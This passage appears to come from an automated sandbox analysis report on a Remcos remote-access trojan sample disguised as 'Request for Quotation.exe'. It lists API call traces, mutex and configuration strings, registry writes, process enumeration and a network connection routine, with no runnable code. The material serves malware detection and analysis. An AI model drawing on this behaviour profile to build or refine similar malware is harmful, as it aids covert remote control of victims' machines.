                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                                                                  • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                                                                  • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                                                                  • Part of subcall function 00407E37: CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                                                                  • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                                                                  • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                                                                  • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                                                                  • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                                                                  • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                                                                  • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                                                                  • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                                                                  • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                                                                • wcscpy.MSVCRT ref: 00409230
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                                                                  • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                                                                  • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                                                                  • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                                                                  • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                                                                  • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                                                                  • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                                                                  • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                                                                  • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                                                                • atoi.MSVCRT ref: 00409391
                                                                                • CreateThread.KERNEL32(00000000,00000000,00413B0F,00000000,00000000,00000000), ref: 004093C0
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                                                                • atoi.MSVCRT ref: 00409540
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                  • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                                                                  • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                                                                  • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                                                                  • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                                                                  • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                                                                  • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                                                                  • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                                                                  • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                                                                  • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                                                                  • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                                                                  • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                                                                  • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                                                                  • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                                                                  • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                                                                • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                                                                • API String ID: 1672879135-1557472714
                                                                                • Opcode ID: aa0dd2ddb201d4670fd5332fb5c6fcc0fdac8b469c95e288c9adb4231053b983
                                                                                • Instruction ID: 756b6b72303f02f0a44bbd524559c36dcc88ee27c0131fa1ad94d22a553bdc8a
                                                                                • Opcode Fuzzy Hash: aa0dd2ddb201d4670fd5332fb5c6fcc0fdac8b469c95e288c9adb4231053b983
                                                                                • Instruction Fuzzy Hash: 5862C572A00648EBDB057BB0AC599FE3B29EB84305F04447EF502A72D2DF784D458B6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040C81C, Relevance: 252.8, APIs: 135, Strings: 9, Instructions: 764sleepnetworkthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00412407: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,73B743E0,0041BCB0,00000000), ref: 00412492
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000), ref: 0040C83F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000029), ref: 0040C855
                                                                                • atoi.MSVCRT ref: 0040C85C
                                                                                • Sleep.KERNEL32(00000000), ref: 0040C870
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416954,?), ref: 0040C884
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C898
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B50,?), ref: 0040C8CE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C8E5
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connecting to ,00000000,00000000,00415B50,00000000), ref: 0040C933
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040C943
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C950
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C961
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C975
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C981
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C99B
                                                                                • gethostbyname.WS2_32(00000000), ref: 0040C9A2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9D7
                                                                                • atoi.MSVCRT ref: 0040C9DE
                                                                                • htons.WS2_32(00000000), ref: 0040C9E6
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA10
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA18
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA21
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA3E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connected to ,00000000,00000000,00415B50,00000000), ref: 0040CA92
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040CAA2
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CAAC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CABD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAD1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CADD
                                                                                • sprintf.MSVCRT ref: 0040CB14
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B954), ref: 0040CB25
                                                                                • _itoa.MSVCRT ref: 0040CB37
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040CB50
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040CB5D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040CB66
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,?,00000104,00000000), ref: 0040CB83
                                                                                  • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                  • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                  • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 0040CBA5
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                  • Part of subcall function 00409E7D: GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                                                                  • Part of subcall function 00409E7D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\Desktop\Request for Quotation.exe,?), ref: 0040CBCC
                                                                                • GetTickCount.KERNEL32 ref: 0040CC20
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,0041B310,00000000,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000), ref: 0040CD07
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD17
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD27
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD37
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310), ref: 0040CD47
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040CD57
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD67
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD77
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD87
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CD97
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDA7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CDB7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDC7
